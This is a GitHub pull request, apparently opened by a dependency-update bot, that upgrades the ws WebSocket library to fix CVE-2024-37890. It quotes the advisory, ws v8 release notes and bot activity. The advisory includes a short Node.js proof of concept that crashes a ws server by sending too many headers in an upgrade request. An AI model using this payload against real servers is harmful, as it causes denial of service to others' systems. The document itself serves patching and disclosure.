Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency ws to v8 [security] #7595

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

live-github-bot[bot]
Copy link
Contributor

@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

Package Type Update Change
ws devDependencies major 7 -> 8
ws dependencies minor 8.17.1 -> 8.18.0

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in [email protected] (websockets/ws@e55e510) and backported to [email protected] (websockets/ws@22c2876), [email protected] (websockets/ws@eeb76d3), and [email protected] (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References


Release Notes

websockets/ws (ws)

v8.0.0

Compare Source

Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or it begins or ends with a white space (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });
    
    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });
  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }
  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

Copy link

vercel bot commented Aug 13, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name Status Preview Comments Updated (UTC)
web-tools ❌ Failed (Inspect) Nov 8, 2024 11:05pm
4 Skipped Deployments
Name Status Preview Comments Updated (UTC)
ledger-live-docs ⬜️ Ignored (Inspect) Visit Preview Nov 8, 2024 11:05pm
ledger-live-github-bot ⬜️ Ignored (Inspect) Visit Preview Nov 8, 2024 11:05pm
native-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Nov 8, 2024 11:05pm
react-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Nov 8, 2024 11:05pm

Copy link

socket-security bot commented Aug 13, 2024

Removed dependencies detected. Learn more about Socket for GitHub ↗︎

🚮 Removed packages: npm/[email protected]

View full report↗︎

@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 87f790d to a2e74a9 Compare August 14, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a2e74a9 to b37c1c5 Compare August 14, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from b37c1c5 to 3bc15be Compare August 14, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 3bc15be to 2819415 Compare August 14, 2024 22:34
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2819415 to 412337d Compare August 14, 2024 22:42
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 412337d to 63cba8c Compare August 14, 2024 22:48
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 63cba8c to 944b294 Compare August 14, 2024 22:55
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 944b294 to 689a0ce Compare August 14, 2024 23:01
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 689a0ce to da11ebc Compare August 15, 2024 22:05
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from da11ebc to 4f03efb Compare August 15, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4f03efb to dfc427a Compare August 15, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 7, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from f965291 to 1bf7617 Compare November 7, 2024 22:50
@live-github-bot live-github-bot bot added the common Has changes in live-common label Nov 7, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1bf7617 to 1824c2f Compare November 7, 2024 22:57
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 7, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1824c2f to 00d832a Compare November 7, 2024 23:04
@live-github-bot live-github-bot bot added the common Has changes in live-common label Nov 7, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 00d832a to 434b79d Compare November 8, 2024 22:06
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 434b79d to ffe7263 Compare November 8, 2024 22:16
@live-github-bot live-github-bot bot added the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ffe7263 to 6e8d677 Compare November 8, 2024 22:27
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 6e8d677 to a52051c Compare November 8, 2024 22:36
@live-github-bot live-github-bot bot added the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a52051c to 2022607 Compare November 8, 2024 22:43
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2022607 to 1fc41f7 Compare November 8, 2024 22:50
@live-github-bot live-github-bot bot added the common Has changes in live-common label Nov 8, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1fc41f7 to ff86f17 Compare November 8, 2024 22:57
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Nov 8, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
common Has changes in live-common security
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants